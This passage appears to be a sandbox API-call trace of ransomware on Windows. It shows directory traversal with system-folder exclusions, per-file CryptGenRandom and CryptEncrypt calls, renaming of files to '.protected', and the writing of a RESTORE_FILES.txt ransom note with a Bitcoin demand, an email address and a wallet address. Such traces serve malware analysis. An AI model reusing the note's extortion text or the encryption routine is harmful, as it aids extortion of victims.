lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.916] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.917] CloseHandle (hObject=0x150) returned 1 [0088.917] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1.protected") returned 161 [0088.917] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\f293aead5e84facfb686c4a620718928_c8424a0b24a72939b13720d0c000c9c1"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\f293aead5e84facfb686c4a620718928_c8424a0b24a72939b13720d0c000c9c1.protected")) returned 1 [0088.919] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.919] lstrcmpiW (lpString1="F90F18257CBB4D84216AC1E1F3BB2C76", lpString2="Windows") returned -1 [0088.919] lstrcmpiW (lpString1="F90F18257CBB4D84216AC1E1F3BB2C76", lpString2="Program Files") returned -1 [0088.919] lstrcmpiW (lpString1="F90F18257CBB4D84216AC1E1F3BB2C76", lpString2="Program Files (x86)") returned -1 [0088.919] lstrcmpiW (lpString1="F90F18257CBB4D84216AC1E1F3BB2C76", lpString2="$Recycle.bin") returned 1 [0088.919] lstrcmpiW (lpString1="F90F18257CBB4D84216AC1E1F3BB2C76", lpString2="System Volume Information") returned -1 [0088.919] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F90F18257CBB4D84216AC1E1F3BB2C76") returned 118 [0088.919] StrStrIW (lpFirst="F90F18257CBB4D84216AC1E1F3BB2C76", lpSrch=".protected") returned 0x0 [0088.919] lstrcmpW (lpString1="F90F18257CBB4D84216AC1E1F3BB2C76", lpString2="RESTORE_FILES.txt") returned -1 [0088.919] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.919] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.919] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F90F18257CBB4D84216AC1E1F3BB2C76" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\f90f18257cbb4d84216ac1e1f3bb2c76"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.920] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F90F18257CBB4D84216AC1E1F3BB2C76") returned 118 [0088.920] StrStrW (lpFirst="F90F18257CBB4D84216AC1E1F3BB2C76", lpSrch=".txt") returned 0x0 [0088.920] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F90F18257CBB4D84216AC1E1F3BB2C76") returned 118 [0088.920] StrStrW (lpFirst="F90F18257CBB4D84216AC1E1F3BB2C76", lpSrch=".rar") returned 0x0 [0088.920] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F90F18257CBB4D84216AC1E1F3BB2C76") returned 118 [0088.920] StrStrW (lpFirst="F90F18257CBB4D84216AC1E1F3BB2C76", lpSrch=".zip") returned 0x0 [0088.920] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x226, lpOverlapped=0x0) returned 1 [0088.921] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffdda, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.921] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x226, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x226, lpOverlapped=0x0) returned 1 [0088.921] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.921] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.921] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.921] CloseHandle (hObject=0x150) returned 1 [0088.921] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F90F18257CBB4D84216AC1E1F3BB2C76.protected") returned 128 [0088.921] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F90F18257CBB4D84216AC1E1F3BB2C76" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\f90f18257cbb4d84216ac1e1f3bb2c76"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F90F18257CBB4D84216AC1E1F3BB2C76.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\f90f18257cbb4d84216ac1e1f3bb2c76.protected")) returned 1 [0088.922] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0088.922] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0088.922] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\RESTORE_FILES.txt") returned 103 [0088.922] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0088.923] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0088.923] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0088.924] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0088.924] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0088.924] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0088.924] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0088.924] CloseHandle (hObject=0x14c) returned 1 [0088.925] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0088.925] lstrcmpiW (lpString1="MetaData", lpString2="Windows") returned -1 [0088.925] lstrcmpiW (lpString1="MetaData", lpString2="Program Files") returned -1 [0088.925] lstrcmpiW (lpString1="MetaData", lpString2="Program Files (x86)") returned -1 [0088.925] lstrcmpiW (lpString1="MetaData", lpString2="$Recycle.bin") returned 1 [0088.925] lstrcmpiW (lpString1="MetaData", lpString2="System Volume Information") returned -1 [0088.925] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData") returned 86 [0088.925] lstrcmpW (lpString1="MetaData", lpString2=".") returned 1 [0088.925] lstrcmpW (lpString1="MetaData", lpString2="..") returned 1 [0088.925] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\*") returned 88 [0088.925] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0088.926] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0088.926] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0088.926] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0088.926] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0088.926] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0088.926] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\.") returned 88 [0088.926] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0088.926] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0088.926] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0088.926] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.926] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.926] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.926] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.926] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0088.926] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0088.926] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0088.926] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0088.926] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0088.926] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\..") returned 89 [0088.926] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0088.927] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0088.927] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0088.927] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0088.927] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.927] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.927] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.927] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.927] lstrcmpiW (lpString1="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", lpString2="Windows") returned -1 [0088.927] lstrcmpiW (lpString1="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", lpString2="Program Files") returned -1 [0088.927] lstrcmpiW (lpString1="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", lpString2="Program Files (x86)") returned -1 [0088.927] lstrcmpiW (lpString1="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", lpString2="$Recycle.bin") returned 1 [0088.927] lstrcmpiW (lpString1="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", lpString2="System Volume Information") returned -1 [0088.927] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B") returned 152 [0088.927] StrStrIW (lpFirst="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", lpSrch=".protected") returned 0x0 [0088.927] lstrcmpW (lpString1="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", lpString2="RESTORE_FILES.txt") returned -1 [0088.927] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.927] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.927] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\024823b39fbeaccdb5c06426a8168e99_6d5cab161a1c65362a913d29be09d91b"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.928] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B") returned 152 [0088.928] StrStrW (lpFirst="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", lpSrch=".txt") returned 0x0 [0088.928] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B") returned 152 [0088.928] StrStrW (lpFirst="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", lpSrch=".rar") returned 0x0 [0088.928] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B") returned 152 [0088.928] StrStrW (lpFirst="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", lpSrch=".zip") returned 0x0 [0088.928] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x190, lpOverlapped=0x0) returned 1 [0088.929] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.929] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x190, lpOverlapped=0x0) returned 1 [0088.929] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.929] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.929] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.929] CloseHandle (hObject=0x150) returned 1 [0088.930] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B.protected") returned 162 [0088.930] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\024823b39fbeaccdb5c06426a8168e99_6d5cab161a1c65362a913d29be09d91b"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\024823b39fbeaccdb5c06426a8168e99_6d5cab161a1c65362a913d29be09d91b.protected")) returned 1 [0088.931] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.931] lstrcmpiW (lpString1="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", lpString2="Windows") returned -1 [0088.931] lstrcmpiW (lpString1="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", lpString2="Program Files") returned -1 [0088.931] lstrcmpiW (lpString1="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", lpString2="Program Files (x86)") returned -1 [0088.931] lstrcmpiW (lpString1="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", lpString2="$Recycle.bin") returned 1 [0088.931] lstrcmpiW (lpString1="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", lpString2="System Volume Information") returned -1 [0088.931] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875") returned 152 [0088.931] StrStrIW (lpFirst="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", lpSrch=".protected") returned 0x0 [0088.931] lstrcmpW (lpString1="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", lpString2="RESTORE_FILES.txt") returned -1 [0088.931] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.931] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.931] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\0f1583fff42fff476a09801acb69213f_e3f4a8c96454d7d3441d2c1bce81f875"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.932] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875") returned 152 [0088.932] StrStrW (lpFirst="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", lpSrch=".txt") returned 0x0 [0088.932] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875") returned 152 [0088.932] StrStrW (lpFirst="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", lpSrch=".rar") returned 0x0 [0088.932] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875") returned 152 [0088.932] StrStrW (lpFirst="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", lpSrch=".zip") returned 0x0 [0088.932] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x166, lpOverlapped=0x0) returned 1 [0088.933] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe9a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.933] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x166, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x166, lpOverlapped=0x0) returned 1 [0088.933] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, 